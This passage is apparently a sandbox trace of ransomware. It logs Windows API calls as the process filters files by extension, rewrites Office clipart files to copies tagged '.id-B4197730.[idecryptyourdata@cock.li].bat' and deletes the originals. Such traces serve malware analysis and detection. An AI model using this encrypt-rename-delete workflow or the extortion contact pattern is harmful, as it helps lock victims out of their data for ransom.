Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 68 [0062.590] lstrlenW (lpString=".zip") returned 4 [0062.590] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.590] lstrlenW (lpString=".rar") returned 4 [0062.590] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.590] lstrlenW (lpString=".bz2") returned 4 [0062.590] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.590] lstrlenW (lpString=".7z") returned 3 [0062.590] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 68 [0062.590] lstrlenW (lpString=".dbf") returned 4 [0062.591] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 68 [0062.591] lstrlenW (lpString=".1cd") returned 4 [0062.591] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 68 [0062.591] lstrlenW (lpString=".jpg") returned 4 [0062.591] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 68 [0062.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 68 [0062.591] lstrlenW (lpString=".doc") returned 4 [0062.591] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.591] lstrlenW (lpString=".docx") returned 5 [0062.591] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.591] lstrlenW (lpString=".pdf") returned 4 [0062.591] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.591] lstrlenW (lpString=".xls") returned 4 [0062.591] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.591] lstrlenW (lpString=".xlsx") returned 5 [0062.591] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.591] lstrlenW (lpString=".ppt") returned 4 [0062.591] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 68 [0062.591] lstrlenW (lpString=".zip") returned 4 [0062.591] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.591] lstrlenW (lpString=".rar") returned 4 [0062.591] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.591] lstrlenW (lpString=".bz2") returned 4 [0062.591] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.591] lstrlenW (lpString=".7z") returned 3 [0062.591] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 68 [0062.591] lstrlenW (lpString=".dbf") returned 4 [0062.591] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 68 [0062.592] lstrlenW (lpString=".1cd") returned 4 [0062.592] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 68 [0062.592] lstrlenW (lpString=".jpg") returned 4 [0062.592] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.592] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0062.592] lstrlenW (lpString="BD00160_.WMF") returned 12 [0062.592] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00160_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0062.592] GetFileSizeEx (in: hFile=0x368, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=22516) returned 1 [0062.592] CloseHandle (hObject=0x368) returned 1 [0062.592] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00160_.wmf")) returned 0x220 [0062.593] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00160_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0062.593] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00160_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0062.593] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.593] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.593] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00160_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0062.593] GetLastError () returned 0x0 [0062.593] ReadFile (in: hFile=0x368, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x57f4, lpOverlapped=0x0) returned 1 [0062.614] WriteFile (in: hFile=0x344, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x5800, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x5800, lpOverlapped=0x0) returned 1 [0062.615] ReadFile (in: hFile=0x368, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0062.615] WriteFile (in: hFile=0x344, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0062.615] SetEndOfFile (hFile=0x344) returned 1 [0062.615] CloseHandle (hObject=0x344) returned 1 [0062.616] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.616] SetEndOfFile (hFile=0x368) returned 1 [0062.617] CloseHandle (hObject=0x368) returned 1 [0062.617] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.618] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00160_.wmf")) returned 1 [0062.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 68 [0062.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 68 [0062.845] lstrlenW (lpString=".doc") returned 4 [0062.845] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.845] lstrlenW (lpString=".docx") returned 5 [0062.845] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.845] lstrlenW (lpString=".pdf") returned 4 [0062.845] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.845] lstrlenW (lpString=".xls") returned 4 [0062.845] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.845] lstrlenW (lpString=".xlsx") returned 5 [0062.845] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.845] lstrlenW (lpString=".ppt") returned 4 [0062.845] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 68 [0062.845] lstrlenW (lpString=".zip") returned 4 [0062.845] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.845] lstrlenW (lpString=".rar") returned 4 [0062.845] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.845] lstrlenW (lpString=".bz2") returned 4 [0062.845] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.845] lstrlenW (lpString=".7z") returned 3 [0062.845] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 68 [0062.846] lstrlenW (lpString=".dbf") returned 4 [0062.846] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 68 [0062.846] lstrlenW (lpString=".1cd") returned 4 [0062.846] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 68 [0062.846] lstrlenW (lpString=".jpg") returned 4 [0062.846] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 68 [0062.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 68 [0062.846] lstrlenW (lpString=".doc") returned 4 [0062.846] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.846] lstrlenW (lpString=".docx") returned 5 [0062.846] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.846] lstrlenW (lpString=".pdf") returned 4 [0062.846] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.846] lstrlenW (lpString=".xls") returned 4 [0062.846] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.846] lstrlenW (lpString=".xlsx") returned 5 [0062.846] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.846] lstrlenW (lpString=".ppt") returned 4 [0062.846] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 68 [0062.846] lstrlenW (lpString=".zip") returned 4 [0062.846] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.846] lstrlenW (lpString=".rar") returned 4 [0062.846] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.846] lstrlenW (lpString=".bz2") returned 4 [0062.847] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.847] lstrlenW (lpString=".7z") returned 3 [0062.847] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 68 [0062.847] lstrlenW (lpString=".dbf") returned 4 [0062.847] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 68 [0062.847] lstrlenW (lpString=".1cd") returned 4 [0062.847] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 68 [0062.847] lstrlenW (lpString=".jpg") returned 4 [0062.847] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.847] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0062.847] lstrlenW (lpString="BD06102_.WMF") returned 12 [0062.847] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06102_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0062.847] GetFileSizeEx (in: hFile=0x2c8, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=16112) returned 1 [0062.848] CloseHandle (hObject=0x2c8) returned 1 [0062.848] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06102_.wmf")) returned 0x220 [0062.848] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06102_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0062.848] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06102_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0062.848] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.848] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.848] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06102_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0062.848] GetLastError () returned 0x0 [0062.848] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x3ef0, lpOverlapped=0x0) returned 1 [0062.892] WriteFile (in: hFile=0x354, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x3f00, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x3f00, lpOverlapped=0x0) returned 1 [0062.893] ReadFile (in: hFile=0x2c8, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0062.893] WriteFile (in: hFile=0x354, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0062.894] SetEndOfFile (hFile=0x354) returned 1 [0062.894] CloseHandle (hObject=0x354) returned 1 [0062.904] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.904] SetEndOfFile (hFile=0x2c8) returned 1 [0062.905] CloseHandle (hObject=0x2c8) returned 1 [0062.905] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.905] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd06102_.wmf")) returned 1 [0062.908] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 68 [0062.908] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 68 [0062.908] lstrlenW (lpString=".doc") returned 4 [0062.908] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.908] lstrlenW (lpString=".docx") returned 5 [0062.909] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.909] lstrlenW (lpString=".pdf") returned 4 [0062.909] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.909] lstrlenW (lpString=".xls") returned 4 [0062.909] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.909] lstrlenW (lpString=".xlsx") returned 5 [0062.909] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.909] lstrlenW (lpString=".ppt") returned 4 [0062.909] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 68 [0062.909] lstrlenW (lpString=".zip") returned 4 [0062.909] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.909] lstrlenW (lpString=".rar") returned 4 [0062.909] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.909] lstrlenW (lpString=".bz2") returned 4 [0062.909] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.909] lstrlenW (lpString=".7z") returned 3 [0062.909] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 68 [0062.909] lstrlenW (lpString=".dbf") returned 4 [0062.909] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 68 [0062.909] lstrlenW (lpString=".1cd") returned 4 [0062.909] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.909] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 68 [0062.909] lstrlenW (lpString=".jpg") returned 4 [0062.909] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 68 [0062.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 68 [0062.910] lstrlenW (lpString=".doc") returned 4 [0062.910] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.910] lstrlenW (lpString=".docx") returned 5 [0062.910] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.910] lstrlenW (lpString=".pdf") returned 4 [0062.910] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.910] lstrlenW (lpString=".xls") returned 4 [0062.910] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.910] lstrlenW (lpString=".xlsx") returned 5 [0062.910] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.910] lstrlenW (lpString=".ppt") returned 4 [0062.910] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 68 [0062.910] lstrlenW (lpString=".zip") returned 4 [0062.910] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.910] lstrlenW (lpString=".rar") returned 4 [0062.910] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.910] lstrlenW (lpString=".bz2") returned 4 [0062.910] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.910] lstrlenW (lpString=".7z") returned 3 [0062.910] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 68 [0062.910] lstrlenW (lpString=".dbf") returned 4 [0062.910] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.910] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 68 [0062.910] lstrlenW (lpString=".1cd") returned 4 [0062.911] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.911] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 68 [0062.911] lstrlenW (lpString=".jpg") returned 4 [0062.911] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.911] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0062.911] lstrlenW (lpString="BD07804_.WMF") returned 12 [0062.911] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07804_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0062.922] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=4924) returned 1 [0062.922] CloseHandle (hObject=0x354) returned 1 [0062.922] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07804_.wmf")) returned 0x220 [0062.922] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07804_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0062.926] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07804_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0062.926] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.926] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.927] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07804_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0062.927] GetLastError () returned 0x0 [0062.927] ReadFile (in: hFile=0x368, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x133c, lpOverlapped=0x0) returned 1 [0062.988] WriteFile (in: hFile=0x344, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x1340, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x1340, lpOverlapped=0x0) returned 1 [0062.988] ReadFile (in: hFile=0x368, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0062.988] WriteFile (in: hFile=0x344, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0062.988] SetEndOfFile (hFile=0x344) returned 1 [0062.989] CloseHandle (hObject=0x344) returned 1 [0062.989] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.990] SetEndOfFile (hFile=0x368) returned 1 [0062.990] CloseHandle (hObject=0x368) returned 1 [0062.990] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.991] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd07804_.wmf")) returned 1 [0062.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 68 [0062.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 68 [0062.991] lstrlenW (lpString=".doc") returned 4 [0062.991] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.991] lstrlenW (lpString=".docx") returned 5 [0062.991] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.991] lstrlenW (lpString=".pdf") returned 4 [0062.991] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.991] lstrlenW (lpString=".xls") returned 4 [0062.991] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.991] lstrlenW (lpString=".xlsx") returned 5 [0062.991] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.991] lstrlenW (lpString=".ppt") returned 4 [0062.991] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.991] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 68 [0062.991] lstrlenW (lpString=".zip") returned 4 [0062.991] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.991] lstrlenW (lpString=".rar") returned 4 [0062.991] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.991] lstrlenW (lpString=".bz2") returned 4 [0062.991] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.991] lstrlenW (lpString=".7z") returned 3 [0062.991] 